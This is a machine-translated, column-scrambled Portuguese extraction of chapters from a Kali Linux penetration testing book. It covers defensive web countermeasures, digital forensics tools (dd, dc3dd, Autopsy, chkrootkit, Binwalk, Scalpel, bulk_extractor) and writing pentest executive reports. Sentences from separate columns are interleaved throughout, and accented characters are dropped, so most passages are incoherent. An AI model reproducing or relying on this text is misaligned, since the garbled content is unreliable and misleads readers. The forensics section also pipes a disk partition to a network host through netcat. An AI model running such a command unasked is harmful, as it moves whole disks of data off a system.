qualquer indicao uma web Ataques DDoS / DoS, na maioria dos longe de sua organizao. Eles fazem que a rede de ver o trfego malicioso aplicao. Quando toda a sesso no casos requerem hardware isso por meio de protocolos de ir disparar alarmes, como Smurf ou est protegido, um usurio pode, infraestrutura de rede abusar. roteamento, como BGP eventualmente, ser atacado. Os desenvolvedores devem garantir pode detectar os scripts no- forense como ns acreditamos que registros. No haveria maneira de toda a sua aplicao suporta web autorizadas, alertar o usurio do script necessrio ter um plano de reao distinguir essa mudana de um seguro e criptografado e impedir que o script quando um de seus amador analista de sesses atravs de SSL / TLS 3.0 de execuo. Os usurios tm a ativos, tais como um servidor web ou erro ou um hacker tentando cobrir para evitar ser vulnervel a ataques. capacidade de desativar os controles aplicativo, est comprometida. seus rastros. [263] de script globalmente por recomendado A maioria dos cientistas forenses vai sesso ou por site. pesquisar outras fontes para um usar dispositivos especializados para Contramedidas defensivas Os autores deste livro so grandes fs treinamento mais completo como este copiar dados bit a bit. L Defesa adicional contra bolinho de noscript, no entanto, voc deve tema se estende para alm tambm um software muito seqestro est disponvel com incentivar as ferramentas disponveis no Kali respeitvel que vai fazer a mesma populares Aplicao desenvolvedores web para configurar Linux. Forense digital uma rea de coisa. importante que o seu Delivery Controller (ADC) aparelhos, cabealho X-Frame-Options em crescente interesse em processo ser muito bem como balanceadores de carga e filtros respostas HTTP para mitigar segurana da informao com muito documentado. A maioria das cpias de contedo. este risco em aplicaes web. Alm poucas pessoas que conhecem bem. digitais em processos judiciais que Vendedores populares a serem disso, alguns controlador de entrega importante lembrar-se de trs regras foram expulsos foram removidos considerados so a Cisco, Bluecoat, de aplicativos a qualquer hora que voc trabalha em devido a um hash de um meio de Riverbed, Websense, e muitos aparelhos (ADCs), oferecem aos forense digital. armazenamento, como outros. Muitos desses vendedores administradores a opo de escrever O no cumprimento destas regras far um disco rgido, no combinando mudar bandeiras de biscoito para scripts personalizados que opinies de vocs parecem amadoras, dados copiados. O hash de um disco Proteger e HttpOnly. Eles tambm pode ajudar a reduzir esse e, provavelmente, tornar a sua rgido no ir corresponder a um tambm tm construdo em tcnicas risco. investigao forense, inclusive. contaminado cpia, mesmo que de decoro para mitigar alguns ataques Alguns sites podem ter razes A primeira regra nunca trabalhar apenas um nico bit modificado. cross-site scripting. legtimas para executar um script. Isso sobre dados originais. Sempre use Uma partida de hash significa que Defesa Clickjacking poderia uma cpia. Certifique-se de no fazer extremamente provvel que os dados Clickjacking estava coberto de ser para carrinhos de compras ou modifique os dados quando voc cria originais, incluindo logs de acesso do Captulo 5, Atacando de autenticao, outros sites de comrcio eletrnico. uma cpia. No momento em que voc sistema de arquivos, apagados disco eo [264] toca ou modificar dados originais, de dados tcnica onde um atacante engana um o caso torna-se intil. Evidncia informaes e metadados uma cpia usurio a clicar em algo que no seja Captulo 7 adulterado nunca pode ser usado em exata da fonte de dados original. o que eles acreditam que esto Forense digital qualquer jurdica A segunda regra para forense digital clicando em. Uma das melhores Kali Linux 1.0 inclui um nmero de prosseguir, independentemente do algo que pode armazenar dados deve maneiras de proteger contra ferramentas para lidar com requisitos que for encontrado. A razo uma ser clickjacking , executando a extenso forenses. vez um original modificado, examinado. Em casos famosos noscript para navegadores Firefox ou Forense a prtica de investigar existe a possibilidade de identificao envolvendo mdia digital, evidncia Chrome. provas e da verificao dos factos de de provas falsas que podem deturpar crtica tem sido Isso vai evitar que cdigos no interesse a verdadeira encontrado em uma cmera, autorizados sejam executados no seu que liga a um incidente. Esta seo incidente. Um exemplo fazer uma gravadores DVR, consoles de navegador web. Noscript lhe dar uma introduo para o digital mudana que ajusta a hora do sistema videogame, celulares, iPods e outros dispositivos digitais aleatrias. Se o Uma investigao forense tudo ser interrogado. unidade inserida no sistema, nada dispositivo tem qualquer capacidade sobre a percepo de ser um Kali Forensics Bota acontecer. possvel que voc pode de armazenamento de dados de especialista em segurana Kali Linux tem a opo de usar um querer utilizador, ento validando evidncias ligadas a um Forensics de inicializao. Modo usar a mdia removvel no modo possvel que o dispositivo pode ser incidente. fcil ser pego procurando forense Kali selecionado forense por mont-lo manualmente. utilizado em uma investigao bandidos e tirar concluses sobre o quando voc inicializar um sistema Isto d forense. No descartar que pode ter acontecido com base na com um disco de boot-up Kali, como o o especialista forense controle um dispositivo de apenas porque opinio. CD ao vivo. Se voc quiser completo do sistema de arquivos e improvvel. Um sistema de navegao Esta uma das maneiras mais usar Kali como um kit de ferramentas mdia que est sendo do carro que armazena mapas e rpidas para desacreditar seu de anlise forense, altamente montado no sistema. msica em cartes SD pode ser usado trabalho. Como um especialista recomendvel manter um Live CD Como dito anteriormente, voc deve por criminosos para esconder os forense, voc como Kali sempre trabalhar em uma cpia da dados, assim fornecer provas s deve expor os fatos. Ser que a parte do seu kit de ferramentas. O Kali fonte de dados. para o uso da Internet baseado em pessoa Alice roubar arquivos de Bob, Vivo CD pode ser obtido como uma importante manter o sistema de download de tags de msica. ou fez a conta imagem ISO baixado arquivos da cpia intacta assim voc [265] que foi registrado como o nome de no site da Kali Linux (consulte a pode mostrar que voc no fez usurio Alice iniciar uma cpia da Captulo 1, sobre a instalao de Kali). modific-lo, bem como de que seus Contramedidas defensivas conta de usurio Quando botas Kali, passos podem ser recriados. Vejamos A ltima regra fundamental para Diretrio home do Bob para uma voc vai ver Modo Forensics como como usar as ferramentas forense digital garantir a documentar unidade USB com XXX nmero de uma das opes seleccionveis. disponvel em Kali copiar e dados de todas as suas descobertas. srie no timestamp [266] hash. Todas as provas e etapas utilizadas XXX XXX em data? Veja a diferena? Anlise do Sistema de Arquivos com para chegar a uma concluso deve O verdadeiro vilo poderia ter roubado Captulo 7 Kali ser de fcil compreenso para ele de Alice Usando Kali em Modo Forense ajuda ferramenta pode ser usada para fazer para ser credvel. Mais importante as credenciais de login (usando voc a atingir o seu nmero de uma uma cpia exata de um sistema de ainda, os seus resultados devem ser mtodos abordados neste livro) e regra de ouro de no arquivos, incluindo excludos e bota recreatable. Independente roubar dados de Bob enquanto modificar o sistema de arquivos de setores. Em muitos casos, o investigadores devem chegar posando como Alice. O momento que origem. O disco rgido interno no instrumento usado para criar um mesma concluso que voc est voc saltar para uma concluso o tocado e no ficheiro de imagem de disco de meios usando a documentao momento em que seu caso h a automontagem dos discos externos e tcnicas. Tambm importante que torna-se inconclusivos base na internos. Parties de swap e de ou discos rgidos. Quando dd cria uma a documentao estabelece um interferncia pessoal. Lembre-se, qualquer outra memria ou cache imagem de disco, ele pode ser cronograma como um forense parties tambm no so utilizados montado e examinadas de eventos quando especificidades especialista, voc pode ser solicitado em qualquer forma. outros sistemas. dd pode salvar a ocorreu e como ocorreu. Todos sob juramento para prestar No modo forense, mdia removvel no imagem de disco em um cronograma depoimento sobre o que exatamente ser montado automaticamente. Se compartilhamento de rede, se concluses devem ser documentadas. aconteceu. Quando qualquer coisa um CD ou um polegar necessrio ou um USB fora de fatos entra o registro, a sua credibilidade dirigir to analistas forenses no toque dd if = <media/partition numa vazia> desmontado e deixar o dd ferramenta uma tima ferramenta, ele pode no no sistema de arquivos local. O de = <image_file> de lidar com as especificidades da ser sempre a melhor ferramenta. Se prximo exemplo ser Para este exemplo, vamos digitar o unidade. Para fazer isso, execute o voc estiver olhando para clonagem examinar como usar dd para fazer seguinte comando para fazer uma comando mostrado na imagem um disco inteiro, existem outras uma cpia de um disco rgido interno. cpia da primeira seguinte: ferramentas populares, como AIMAGE O primeiro passo partio: A localizao do dispositivo USB foi / ou AIR Imager, que selecionar uma mquina de destino e dd if = / dev/sda1 of = sda1-image.dd Dev / null /; no entanto, voc pode no vem pr-carregado com Kali, mas arrancar com o Live CD Kali no modo Isso ir criar um arquivo de imagem escolher qualquer local. so muito populares. importante forense. que uma cpia exata de nosso sda1 Voc tambm pode salvar a imagem confirmar Vamos executar o comando sfdisk-l partio para o nosso local diretamente em um compartilhamento ferramentas utilizadas em uma para exibir as informaes do disco no sistema de arquivos. Espero que voc de rede NFS. Voc pode fazer isso investigao forense aderir a sistema ver um grande problema com o que usando admissibilidade evidncias padro estamos realizando anlise. fizemos. Ns apenas quebrou uma o seguinte comando: regulamentos, se existe a dd uma das ferramentas Linux / Unix das dd if = / dev/sda1 | porto nc possibilidade que a investigao ser mais comuns usados para copiar nossas regras de ouro de no my_ip_address_to_network_server usado em uma questo jurdica. sistemas de arquivos. O modificar os dados originais, quando opcional dc3dd [267] escreveu o arquivo para o nosso No exemplo a seguir, estamos dc3dd o dd ferramenta com sistema local, o que considerado clonando a partio sda1 para nosso funcionalidades adicionais para Contramedidas defensivas como modificar os dados. A melhor armazenamento NFS anlise forense. dc3dd pode calcular A figura anterior mostra cinco prtica escrever o servidor com um endereo IP de um parties. Divisrias 1, 2, e 5parecem arquivo de imagem para um outro 10.0.0.5: de hash entre a unidade que voc o mais interessante, uma vez partio sistema de arquivos, como uma dd if = / dev/sda1 | nc 10.0.0.5 est copiando e da unidade de origem 3e 4so listados como vazio. Lembre- partio diferente, compartilhamento [268] em um nvel pouco a pouco. se, troca de rede, ou um Isso fundamental quando se parties podem conter informaes Drive USB. Preferncia pessoal do Captulo 7 pretende provar a cpia dos dados que sobraram de atividades do autor est usando um drive USB, no Existem outras ferramentas que esto que voc est trabalhando usurio e cache. Se tivssemos entanto, para este disponveis para clonar um sistema de exatamente como o arrancado com o CD ao vivo em um exemplo, utilizando-se o sistema local arquivos. Recomenda-se o inicial. Isto pode ser realizado atravs sistema baseado no Windows, aceitvel para fins de teste. dd ferramenta para clonar parties da criao de um hash de o original e veramos uma partio diferente Para utilizar um drive USB para o especficas, porque construdo em a cpia estrutura, no entanto, o conceito armazenamento do sistema copiado, Kali ea maioria dos outros para verificar mais tarde uma partida. global seria a mesma. primeiro voc precisa ligar Sistemas Linux e Unix. O processo Para o prximo exemplo, vamos O prximo passo decidir qual um grande drive USB em seu sistema. para clonar um sistema pode ser executar o sfdisk-l comando para ver partio para copiar. Vamos Desde que voc est no modo forense muito demorado, as unidades e selecionar a primeira partio listados na Vivo dependendo de quo grande a parties disponveis, como mostrado na imagem anterior como / Dev/sda1. CD, Kali no vai montar a unidade partio que voc est tentando na imagem seguinte: O uso bsico do dd comando como USB. Normalmente, voc quer deixar copiar. Embora dd O dc3dd comando executado de segue: o sistema de arquivos uma forma semelhante como o dd ferramenta. Voc escolhe uma fonte unidade ou partio, bem como o Kali tem inmeras ferramentas tipos de sistema o volume. O uso mais um exemplo anterior com a ferramenta destino para salvar a imagem. H forenses construdo em na categoria comum de autpsia como uma dd, como mostrado na imagem tambm um hash rotulada Forensics. gesto de casos seguinte: opo. No prximo exemplo, tomamos Aqui esto algumas ferramentas ferramenta para o gerenciamento de [272] a partio de / Dev/sda2 e copi-lo comumente usadas em Kali, quando anlise de arquivos de imagem. para uma aplicado a aplicaes web forense: Lembre-se de como ns criamos um Captulo 7 arquivo de imagem chamado Outras ferramentas forenses em Kali arquivo de imagem O primeiro passo carregar um CopyofDrivedc3dd, juntamente com o chkrootkit usando o dd ferramenta? Autpsia vai Autpsia de imagem como clculo de um hash utilizando sha256. chkrootkit pode ser executado em nos ajudar a investigar a imagem. mytestimage.dd. [269] sistemas Linux para determinar se Para executar Autopsy, navegue at Voc ter a opo de definir um valor rootkits existir no Kali Linux |Forensics |Digital Forensics de hash para o arquivo quando se Contramedidas defensivas sistema, com base em assinaturas e e selecione utiliza o dd ferramenta. Este exemplo para fins de processos. Pense nisso como Autpsia. Isso far com que um Voc pode ter Autopsy calcular o valor demonstrao. Um verdadeiro forense antivrus ou Terminal janela, que ir iniciar a hash. Os autores recomendam o investigao no iria salvar a imagem antimalware para sistemas Linux. aplicao. clculo de volta para a mesma unidade. Para executar o chkrootkit, abra um Deixe essa janela aberta e use a seu prprio MD5 checksum. Isto pode dc3dd lhe dar um cdigo hash Terminal janela e tipo chkrootkit. Este ferramenta por meio de sua interface ser feito usando o md5sum comando exclusivo para o arquivo de entrada da ir verificar web. Para acessar a web em um arquivo. unidade copiada quando o sistema operacional local para todos interface, abra um navegador web e [273] ela completa. os rootkits instalados. navegue at importante demonstrar a hash da Chkrootkit um programa simples que http://localhost:9000/autopsy. Contramedidas defensivas cpia coincide exactamente com o pode garantir a sua cpia de Kali no [271] Voc pode pegar o valor que original. Podemos foi calculado e coloc-lo diretamente na use o comando sha256sum para infectado. Voc tambm pode Contramedidas defensivas autpsia. calcular o hash. Se calcularmos o executar chkrootkit em outras Selecionar Novo caso para criar um Autpsia uma plataforma que pode hash em nosso arquivo distribuies Linux, instalando novo caso. Isto lhe dar o seguinte ajudar a coletar informaes forense CopyofDrivedc3dd bem como a nossa que nesses sistemas. imagem de exemplo: para documentao unidade de disco rgido / Dev/sda2, Autpsia Autpsia ir pedir a algumas fins. Quando uma partio est pronta Vamos ver que eles correspondem. Autpsia uma ferramenta forense perguntas antes de continuar. para ser examinada, voc pode usar Ns digital de open source que roda em Perguntas incluem definio Autpsia de olhar pode at mesmo ver a sada da nossa Windows, Linux, OS X, o fuso horrio, entrando no disco especfico, informaes, cpia dc3dd tambm o mesmo. e outros sistemas Unix. Autpsia pode deslocamentos de tempo entre o seu arquivos raw, e seus metadados do Desde o hash corresponde, ser utilizado para analisar imagens de sistema de Kali e do sistema arquivo. Autpsia tambm pode temos confirmado os arquivos so disco e realizar esto investigando, e descries, tais conectar-se ao Instituto Nacional de exatamente os mesmos para uma uma anlise em profundidade dos como nomes de host. Padres de Software Biblioteca de investigao forense. sistemas de arquivos, como NTFS, O prximo exemplo usaremos Referncia para comparar [270] FAT, HFS +, Ext3, UFS, e vrios autpsia para examinar um arquivo de hashes de arquivos conhecidos para imagem que foi criada no determinar se eles so bons ou maus Captulo 7 programas. Binwalk A figura anterior mostra o linha de comando para identificar SQLite Manager. Muitas vezes, difcil de determinar a administrador baixado um arquivo arquivos Pasco finalidade de arquivos binrios binrio e tipos. Estes tipos embutidos olhar para [275] identificados durante renomeou para fazer parecer que ele as estruturas de dados de um uma investigao forense. A razo o estava vindo de um fornecedor determinado formato de arquivo, Contramedidas defensivas cdigo-fonte para arquivos binrios diferente (FW_WRT54G permitindo que Bisturi normalmente um roteador Linksys). Binwalk foi para uma recuperao mais confivel Scalpel um utilitrio escultura no disponvel. Binwalk uma capaz de analisar o arquivo e alerta e mais rpido. arquivo que procura um banco de ferramenta de anlise de firmware que o arquivo um Pasco uma ferramenta forense para dados de cabealho do arquivo projetado para auxiliar na anlise, Sercom firmware arquivo, mesmo que ler o index.dat arquivos que so conhecidos e extrao, e engenharia reversa de o arquivo foi renomeado para o criados pela Microsoft assinaturas de rodap, e as tentativas imagens de firmware e outros formato Linksys. Internet Explorer. O Internet Explorer de esculpir arquivos uma imagem de softwares binrio. pdf-parser index.dat arquivos armazenam disco. Isto feito pela O foco Binwalk arquivos binrios de pdf-analisador usado para analisar e navegador do usurio configurar o scalpel.conf arquivo com firmware, no entanto, existem analisar Portable Document Format histria, que pode ser til para uma o tipo (s) arquivo que voc gostaria de atualizaes localizadas (PDF) investigao de um host. Microsoft localizar para redes domsticas e de documentos, bem como extrato de armazena o antes de lan-lo contra um banco de equipamentos sem fio, bem como informao em bruto, tais como index.dat apresentar em vrios locais dados. outro consumidor cdigo, imagens, e outros no disco rgido do sistema host. Por bulk_extractor pode extrair uma aparelhos eletrnicos. elementos de documentos PDF. exemplo, variedade de coisas a partir de uma Binwalk tem algumas opes uma ferramenta utilizada para analisar alguns index.dat arquivos esto em imagem, incluindo carto de crdito diferentes que podem ser encontrados e desconstruir PDF pasta pessoal do usurio usada para o nmeros, nmeros de telefone, URLs, em: https://code.google. documentos que so identificados perfil do usurio. e-mails. bulk_extractor tambm pode com / p / binwalk / wiki / Uso. Voc como possivelmente ter cdigo Pasco s funciona para o Internet gerar pode executar o comando binwalk malicioso. Explorer. Outros navegadores como Wordlists a partir de uma imagem que com o nome do arquivo Principal Firefox e pode ser usada em ataques de do arquivo binrio que voc gostaria Acima de tudo um utilitrio de Chrome no deixe arquivos de dicionrio. bulk_extractor de examinar. O prximo exemplo usa escultura de dados usado para index.dat. pode levar vrias horas para ser binwalk em um recuperar arquivos com base em seus Firefox e Chrome informaes executado, mas os dados que firmware binrio para um roteador sem cabealhos, navegador do armazenamento em extrado valeu a pena esperar fio em casa, como mostrado na rodaps e estruturas de dados bancos de dados SQLite. para uso em medicina forense. imagem seguinte: internas. Acima de tudo funciona com O local da base de dados varia de bulk_extractor Binwalk resultados sada do arquivo arquivos de imagem, tais como os sistema operacional para operao Resumo binrio: gerado pela dd, Safeback, Encase, ou sistema, mas eles podem ser abertos fundamental que a segurana [274] diretamente na unidade. Os com qualquer visualizador SQLite. Um considerada durante todo o ciclo de cabealhos de arquivo de imagem e dos vida de todos os recursos Captulo 7 rodaps pode ser especificado por um ferramentas favoritas do autor para que so importantes para as arquivo de configurao ou usando clientes SQLite um plugin do Firefox operaes comerciais. Nossa meta chamado para escrever este livro para alm apoiar um verificador da penetrao [276] encontrar um estilo consistente, os estilos e fluxos adequados associados educar leitores sobre vrios mtodos; autores deste livro recomendam A com auditorias tcnicas. Isto inclui a malicioso Ensaio de Penetrao Modern Language indstria os usurios podem comprometer um Relatrio Executivo Association of America Style, ou normas que vm de organizaes recurso, para que os administradores Antes de comearmos, queremos melhor conhecido como MLA. MLA especficas PCI e outro setor, como podem melhorar a sua segurana destacar neste captulo toques sobre um fcil de usar COBIT eo ITIL. Em ltima anlise, o defesas. Todo mundo um alvo, e temas de estilo de escrita, usado pela maioria tema de seu relatrio seguir o aceite cabe ao proprietrio de ativos para escrever relatrios, clusulas e das escolas de ensino mdio como padres de governana corporativa investir o bom acordos. Estes exemplos devem ser um padro de escrita. H. Ramsey para a organizao que voc est tempo e recursos para a reduo do utilizados como general Fowler auditando. Alm disso, mantenha risco de ser comprometida. diretrizes. De nenhuma maneira e Jane E. Aaron guia de referncia, em mente que um relatrio penetrao Este captulo serve como um meio estamos advoga ter conhecimentos ou com o ttulo A Little, Brown Handbook, ser visto por muitas pessoas, e para se defender contra ataques tcnicas que poderiam um excelente referiu-se por um apresentados no anterior ser aceito de forma legal. Apesar de guia de referncia sobre como usar perodo mais longo de tempo do que captulos. Deve-se supor que as sete dos nossos perfis do Facebook, corretamente estilos MLA quando voc provavelmente pretendia. ferramentas utilizadas nos captulos sendo advogados, escreve. Como Penetrao Os clientes querem saber como eles anteriores pode ser e sendo fs de Boston Legal, no Tester, e, finalmente, como um so vulnerveis, e os requisitos para aproveitados para verificar somos Denny Crane. Recomendamos auditor, o valor que voc fornecer corrigir falhas vulnerabilidades em seus prprios quando voc sero julgados em como para que eles reduzam o risco global sistemas. Os tpicos abordados neste levar a srio sobre o desenvolvimento suas concluses so apresentadas. A de segurana contra ataques. captulo includo como clonar uma de escopos, contratos e relatrios, razo nmero um relatrios de teste Formatao e tom de aplicao web para evitar sistemas voc procura profissional de penetrao falhar um relatrio pode causar uma reao ativos de teste, ajuda legal. m gramtica ou ortografia. O positiva ou negativa aos dados. Os padres de segurana da linha de Os engenheiros de rede instalao de nmero dois motivo de fluxo ou trabalhos podem ser rescindido base, e defesa contra tpicos de redes, programadores criar aplicaes estilos ilgico. Que por ter sido ligado a uma captulos anteriores. e auditores por isso que altamente vulnerabilidade. Em contrrio, uma Esses temas incluem senhas, ataques escrever. Como um verificador da recomendvel ter o seu relatrio lacuna crtica na segurana poderia man-in-the-middle, striping SSL, DoS, penetrao da rede, voc est, por revisado com indivduos no ser roubar cookies, e clickjacking. Este padro, um auditor. Ao contrrio de relacionado com o seu projeto para ignorado se a linguagem de um captulo tambm inclui uma seo um fornecer uma perspectiva outsider. relatrio no corretamente destacar dedicada rede engenheiro que ir configurar Isto pode incluir ter como essencial uma correo sobre o uso de Kali Linux para protocolos de roteamento, ou um colaboradores que no so tcnicos. necessrio. Os melhores prestadores investigaes forenses. programador que vai de servios pode equilibrar as O prximo captulo ir cobrir as criar um aplicativo, o seu valor ser Penetration Test Relatrio Executivo competncias tcnicas e de negcios melhores prticas para a entrega de baseado em sua escrita. Em outras Como voc apresentar resultados ser no desenvolvimento de relatrios Teste de Invaso palavras, aprender o fator mais influente e determinante executivos para que o resultado final servios, incluindo mtodos para como escrever. No uma cincia e para futuros negcios. Uma vez que ter um impacto positivo desenvolver as entregas dos clientes arte associada com a escrita. Se voc voc se familiarizar com um estilo de liderana e equipe tcnica. profissionais. est tentando escrita, h mais Um bom ponto de partida olhar para manuteno da engrenagem H muitos padres importantes da o que os regulamentos, normas e existente, bem como manter-se com a As linhas de base: Eles so usados indstria que seus clientes esto mandatos so mais recente tecnologia. Um simples para criar um nvel mnimo de mandatados para importante para o seu cliente. analogia quando a maioria das segurana necessrio seguir. A lista a seguir comumente Misturando os requisitos do cliente pessoas compra um laptop, eles atender s exigncias polticas. As usado para justificar a aquisio de solicitado com a indstria olham para o software para instalar linhas de base pode ser financiamento para mandatos o primeiro tpico deste para a funcionalidade em vez de configuraes, arquiteturas, ou produtos e servios: captulo. Em seguida, vamos olhar defesa (ou seja, a compra de procedimentos que podem ou no Seguro de Sade Portabilidade e para o servio diferente Microsoft Word, em vez refletem o processo de negcio, mas Accountability Act (HIPAA): Requer modelos utilizados para cobrar por do que um antivrus). Quando esse pode ser que controles adequados so postas servios de entrega. Depois disso, mesmo laptop infectado, os usurios adaptado para atender a essas em prtica para garantir as operaes vamos nos concentrar em diferentes parar de pensar exigncias. Voc pode usar linhas de de cuidados de sade tipos de documentos, formatao de software sobre funcional e priorizar a base como uma abstrao e sistemas de informao relatrios executivos para que voc obteno de software de segurana para desenvolver padres. administrativos proteger possa deixar o bom para remover o Padres: So requisitos obrigatrios individualmente identificveis engajamento ps impresso servio. aplicativo malicioso. que suportam de nvel superior informaes de sade eletrnico. H Este captulo ser concludo com [278] polticas. Um padro pode exigir a um baixo risco de multas associadas a alguns exemplos utilizao de uma tecnologia HIPAA no conformidade, no entanto, relatrios e cobrir as ferramentas de Captulo 8 especfica incluindo os riscos colaterais significativos, relatrios restantes disponveis em Um mtodo para elevar os seus marca, produto e protocolo. Um como Kali Linux. servios para o topo da lista de exemplo a criao de um padro responsabilidade civil e marca dano Observncia prioridade de compra para 802.1x pode resultar de no cumprir HIPPA Os clientes tm oramentos limitados alinhando com mandatos de negcios. usando o Cisco Identity Services requisitos. e, normalmente, a segurana no Os clientes so mais propensos a Engine a partir de uma linha de base Federal Information Processing um gasto superior comprar servios de ter que ter uma forma Standards (FIPS): So computadores objetivo em relao a compra pr- cumprimento das obrigaes automatizado de controle de acesso. nos EUA ativa. Em nossa experincia, os empresariais, tornando a conversa Diretrizes: So recomendaes em normas de segurana desenvolvidas clientes gastaro investimento mais fcil de justificar. vez do que o necessrio. Considerar para proteger a informao transmitida dinheiro em outras reas de Muitos mandatos do setor tm graves diretrizes semelhantes s normas, no por tecnologia at que algo ruim acontece repercusses para no auditorias que entanto, nada obriga as pessoas a agncias governamentais e causando reativa vo seguir prestadores de servios. gastos. Torna-se ainda mais de multas a terminao do trabalho. los. Um exemplo o controle que desafiador para oferecer servios que Alinhando suas entregas com as portas abrir em um firewall, em vez de [279] avaliam existente normas obrigatrias usando a permitir que todos regra de segurana, como um teste de uma opo forte para justificar a trfego. Penetration Test Relatrio Executivo penetrao quando muitos clientes aquisio de seus servios. tm problemas suficientes Termos que so importantes em Lei de Gesto de Segurana da relao ao cumprimento da indstria Os padres da indstria Informao Federal (FISMA) / so as seguintes: Nacional Instituto de Padres e Tecnologia divulgaes de empresas e evitar a incidentes imprevistos. situao, recomendamos trabalhar (NIST): A FISMA e NIST especial fraude contbil. [280] com os clientes sobre como solicitar 800-153 e 800-137 publicaes condies especficas fornecer um quadro abrangente para Captulo 8 e condies que apenas candidatos garantir a eficcia dos controles de Os clientes tendem a inclinar-se para qualificados poderiam se encontrar, segurana da informao sobre os Servios profissionais servios chave na mo com base na para forar um equilbrio de melhor recursos As estratgias mais comuns para capacidade de planejar valor e custo como uma mtrica de que suportam as operaes e ativos cobrar os clientes para os servios para os custos esperados. Os clientes premiao. federais. so Turnkey e hora e podem concentrar-se em atingir os O outro mtodo comum de servios de North American Electric Reliability Relevante. Turnkey, todos os servios resultados esperados da faturamento tempo e materiais. Corporao (NERC): Desenvolveu tm um custo conjunto que s pode servios solicitados e prestadores de Tempo e obrigatrio Proteco das Infra- (CIP), ajustar se os servios servios espera quando responsvel Propostas Materiais cobrar por horas normas de segurana ciberntica so solicitados fora do acordado tarefas no so de utilizao. Normalmente, os para proteger os cibernticos ativos escopo do trabalho. Normalmente, completou, sem incorrer em custos de prestadores de servios ir listar essenciais que controlam ou afetam a modificaes para um trabalho adicionais. Grandes diferentes preos por hora para as confiabilidade do Engajamento Turnkey exigem um organizaes, como os EUA categorias de faturamento, tais como Sistemas eltricos em massa norte- pedido separado para a mudana que governo federal so conhecidos por Gerente de Projetos pode ser 100 americano. Aprovado pelo Energia o cliente deve solicitar servios Turnkey em formais dlares por hora, mas um engenheiro Federal aceitar antes da incluso cobrana Pedidos snior de 200 dlares por hora. Comisso Reguladora (FERC), o adicional. para saber o Preo (RFP) postagens comum que cumprimento destes padres Servios Turnkey colocar o risco de pblicas. Na maioria das situaes, h servios a serem divididos em ordens obrigatrio para todas as perder a rentabilidade do fornecedor orientaes escritas de servio com horas esperados para organizaes envolvidas com a granel de servios, porque pelo escritrio de compras para ajudar o cliente do pas eltrica custo no ajusta independentemente determinar quem ser concedido o preparar-se para os encargos rede. da quantidade de trabalho necessria engajamento baseado previstos, o projeto continua. Payment Card Industry Data Security para atender o escopo de de fatores como melhor valor, preo e Time and Materials coloca o risco de Standard (PCI DSS) e Pagamento trabalho. Isto significa que o prestador itens de reunio necessrio. Vimos servios de alto custo para o cliente, Aplicao de Segurana de Dados de servios tem a oportunidade de RFPs porque Padro (PA-DSS): Estas so as executar tarefas sob sair pela culatra quando o escritrio de servios que superem as ordens de normas para tempo proposto igualando lucro compras seleciona servios baseados servio continuam a ser cobrado. O organizaes que lidam com adicional. Isso tambm poderia sair exclusivamente em melhor preo. Em benefcio para os clientes informaes do titular do carto para o pela culatra quando os servios Nalguns casos, os servios de maus eles podem ser capazes de gastar dbito principal, de crdito, exceder o custo do trabalho. por causar mais problemas do custo e menos, se eles podem possuir parte pr-pago, e-bolsa, ATM e cartes de isso que absolutamente essencial vrias vezes mais altas do trabalho, bem como evitar a POS. para definir um realizveis para remediar do que a oferta de horas de enchimento extras comuns Lei Sarbanes-Oxley (SOX): Ele exige escopo de trabalho para os servios melhor valor anterior. Para ajudar os acusados de uma proposta Turnkey. A reformas rigorosas para melhorar propostos, com algumas horas de clientes a evitar este desvantagem para financeiro preenchimento adicionais utilizados para clientes o prestador de servios no Documentao est a ter tanto um escritor de edio exemplos para o cumprimento das incentivado a terminar o projeto e O desenvolvimento de um produto tcnica e profissional do projecto para metas de formatao de uma forma poderia final pode ser dividida em alguns se certificar de que profissional. atrasar a concluso. estgios, tal como mostrado no endereos tanto necessidades de [282] Como um profissional prestador de seguinte pessoal tcnico e executivo. servios, recomenda-se a apontar diagrama. O primeiro estgio o Projeto Captulo 8 para o desenvolvimento de um Projeto de Reviso. Este o lugar Reviso Capa Servios Turnkey oferta como voc onde o prestador de servios Informaes A pgina de rosto em um mnimo ir construir uma prtica. Prticas bem comentrios Coleo fornecer um nome de relatrio, verso, definidos pode definir a declarao de trabalho, objetivos de Primeira Verso data, autor, servio expectativas adequadas com clientes negcio do cliente, reas de interesse, Comente e nome do fornecedor, eo partido para evitar nos servios de escopo e props finalizao pretendia. As folhas de rosto tambm esperado. No nosso valor para fornecer. Tudo isso mais o Um escopo de trabalho deve sempre pode listar os itens adicionais, tais experincia, os clientes no tm tales material identificado adicional usado contabilizar horas necessrias para como a classificao de segurana de de cheques em branco para os para construir um criar documentos ou de destaque os servios, e desejo um conjunto modelo de relatrio. documentao. Normalmente 60 por resultados de outras sees. custar antes de solicitar para o O prximo passo o preenchimento cento do tempo relatrio escrita ser Declarao de Confidencialidade oramento. do modelo de relatrio durante a fase utilizado para o projecto, e reviso de As informaes obtidas durante a Periodicamente, os clientes podem de Coleta de Informaes. documentos e assinar projeto ir maioria dos servios de penetrao solicitar para substituir membros A informao capturada inclui utilizar o ser faturveis com a sua dispositivos identificados, processos restantes horas. Certifique-se de sensvel. fundamental para pessoal para reduzir o custo total do utilizados, vulnerabilidades calcular o ciclo de vida do documento identificar o nvel de segurana projeto. Por exemplo, um cliente pode encontrado, verificao de em sua esperado para proteger informaes pedir para vulnerabilidades, sugeriu remediao, cronograma do projeto, para evitar capturados durante o trabalho, bem usar um gerente de projeto interno e outros dados. perda de receita. como o nome que permitido para ver para o planejamento. Este introduz o Uma vez que todos os dados so Formato do relatrio como risco de capturados e alinhado com o modelo, Independentemente do tipo de projeto, dados. Certos nveis de folga pode no gerir adequadamente os recursos, a terceira fase a preparao h alguns itens que devem ser exigir tratamento especial ou em o que poderia levar a problemas e um primeiro esboo. Este projecto no includos locais protegidos causa ser voltado para clientes e conter o em servios de documentos de para o armazenamento, tais como um horas excessivas que vai comer fora mximo de dados resultado final. Todos os documentos Sensitive Information Facility em lucros esperados. Recomendamos possvel. ltima a fase de reviso, devem explicar o seu propsito, Compartmented (SCIF) para evitar estas situaes, porque difcil usada para emagrecer o relatrio com anunciar a sua marca, identificar as armazenamento de material de controlar um membro da equipe os dados mais forte partes envolvidas, o trabalho lista que classificado. Violaes de privacidade que no diretamente parte de sua juntamente com o ajuste para atender foi realizada, e de dados pode ter financeira, marca e organizao. s demandas de negcios de uma Concluo com um resultado esperado. repercusses legais. [281] forma profissional. Melhores prticas Esta seo ir fornecer algumas dicas Uma declarao de confidencialidade e deve explicar qual o nvel de Penetration Test Relatrio Executivo segurana est envolvido com o documento, que est autorizado a proibida. Jeff Mills As fases de apresentao da fase de v-lo, o que eo que no permitido Exemplo 